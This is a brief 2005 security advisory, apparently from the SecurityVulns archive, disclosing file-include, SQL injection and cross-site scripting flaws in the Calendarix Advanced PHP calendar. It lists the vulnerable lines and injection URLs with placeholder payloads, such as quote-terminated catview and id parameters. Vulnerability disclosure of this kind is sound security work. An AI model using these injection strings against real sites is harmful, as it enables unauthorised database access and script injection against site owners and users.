multiple vulnerability Calendarix Advanced

2005-06-01T00:00:00
ID SECURITYVULNS:DOC:8757
Type securityvulns
Reporter Securityvulns
Modified 2005-06-01T00:00:00

Description

/******* * Advisorie : 01-0005-15 * title: multiple vulnerability * Software: Calendarix Advanced * Date: 28. April 2005 * Web: http://www.calendarix.com/ **********/

  • Affected software description:

Webcalendar is a web software write in php y mysql

  • Expoit:

    Include
    
    line 16 
    admin/cal_admintop.php:include_once ($calpath."cal_utils.php");
    
    xss and sql injection
    
    line 122 - 160
    cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
    cal_pophols.php?id=999'[sql]/*  
    line 23
    calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
    line 194 - 196
    cal_week.php?op=week&catview= 999'[sql]/*
    line 34 - 39
    cal_cat.php?op=cats&catview=999'[sql]*/
    
  • How to fix:

    Vendor no responds
    
  • Credits:

    DarkBicho
    Email: darkbicho@gmail.com
    Web: http://www.swp-scene.org
    
  • Grettings: "A mi Team SWP" " Viva el Peru Carajo"

--


Miguel Sumaran (DarkBicho) webpage: http://www.darkbicho.tk/ Team : http://www.swp-scene.org/ Made in Peru